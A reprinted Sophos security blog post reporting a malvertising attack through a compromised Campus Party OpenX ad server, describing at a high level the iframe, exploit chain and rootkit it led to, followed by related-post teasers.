As we all know, compromised sites play an important role in web distributed malware, acting as the conduit, guiding user traffic to further malicious content. Sometimes, the attackers get lucky, and succeed in compromising a high profile, popular site. Another way to increase the number of users exposed to the attack is to compromise advertising content, thereby exposing all users of any 3rd party sites that happen to load the ads.
Late yesterday evening, we started to see evidence of such an attack – Sophos products were blocking certain ad content as Mal/Iframe-U.
Knowing that detection and what it looked for, I was pretty sure that the ad server of Campus Party was compromised.
Sure enough, I could see that in addition to the desired ads (for the July Campus Party event in Valencia), the content also contained malicious JavaScript (highlighted in yellow):
Not the first time I have seen an OpenX ad-server getting compromised, and I suspect it won’t be the last.
Deobfuscating the JavaScript reveals the payload. As our Mal/Iframe-U detection name suggests, it is an iframe to load further malicious content from a remote server.
This initiates the attack, triggering a chain of events summarised below:
- ad content (pro-actively blocked as Mal/Iframe-U) silently loads content from the attack site.
- user’s browser and browser plug-ins are inspected to determine most appropriate exploit content to load. For this a legitimate library is used.
- exploit content (e.g. Mal/HcpExpl-A, Troj/Lifsect-A, Mal/ExpJS-M) is loaded in order to infect the user with malware. At the time of writing, the exploit site is currently serving up a rootkit which Sophos products detect as Mal/TDSSPack-AX.
As is typically the case for today’s web attacks, all of the script components used are heavily obfuscated in an attempt to thwart detection efforts and hinder analysis.
We have already informed those at Campus Party about this issue in order that they can get the malvertising attack cleaned up as soon as possible. In fact as I type, I can see that the ad server is already offline, presumably whilst they resolve the issue. Kudos to them for actioning this quickly!
As to the root cause of the compromise, I do not know exactly how the server was compromised. However, given history, my money would be on an out of date or unpatched version of OpenX.
Related Posts
- Lab Matters – Dissecting the Banking Malware Problem
Kaspersky Lab malware researcher Vicente Diaz joins the Lab Matters webcast to discuss the banking malware epidemic in Europe and offer suggestions for consumers doing business on the Web.... - Analysis of the New Adobe Flash Attacks
When Adobe warned customers earlier this week about a newly discovered vulnerability in the Flash Player software, company officials said that there were already attacks underway against the bug. Thos... - worldsex.com serves malware through malvertising
Popular adult site worldsex.com is serving malware right now through a malicious ad. Getting infected is based on the likelihood of hitting the ad, which if you refresh the page a few times happens. ... - Blog: Lab Matters: An inside look at mobile malware threats
Ryan Naraine talks to mobile malware researcher Denis Denis Maslennikov about the mobile malware landscape.
View full post on Securelist / All Updates... - Increased Focus on ZeuS Malware Clears the Way for Other Threats (PC World)
PC World - The ZeuS "crimeware toolkit" has made recent headlines lately by garnering attention of the FBI, and for the new components that allow hackers to break into BlackBerry and Symbian phones.
... - Troj/PDFEx-DF: SophosLabs sees malware exploiting /Launch
Last week, I talked about how to disable some functionality in Adobe Acrobat (see blog).
This morning, we released generic detection for something we call Sus/PDFJs-S. Sophos will generically detect P... - Webcast: Malware Threats and Defenses That Work
Malicious software is an integral and dangerous component of many breaches. Despite the general acknowledgement of the problem, malware thrives in the Internet ecosystem, affecting organizations large... - Osama bin Laden dead – so watch for the spams and scams
Google's top-trending Anglophone search term right now is, understandably, "osama bin laden dead". Google officially describes its hotness (you couldn't make this stuff up) as volcanic.The short versi... - TDL4 rootkit is coming back stronger than before
After some months since the last blog post about the TDL rootkit, we have to come back and write again about this nasty threat that is targetting both 32 bit and 64 bit versions of the Windows operati... - TDL4 revisited
I just saw an article by Mathew Schwartz for Information Week focused on a series of articles by Aleksandr Matrosov, Eugene Rodionov and myself for Infosec Institute.The articles are actually bas...
Posted on 29 April 2011. Tags: HackingTheWeb, malvertising, Malware, rootkit, SophosLabs, TDSS, Threats, Web
The above information is reprinted from and copyrighted © by Naked Security - Sophos.
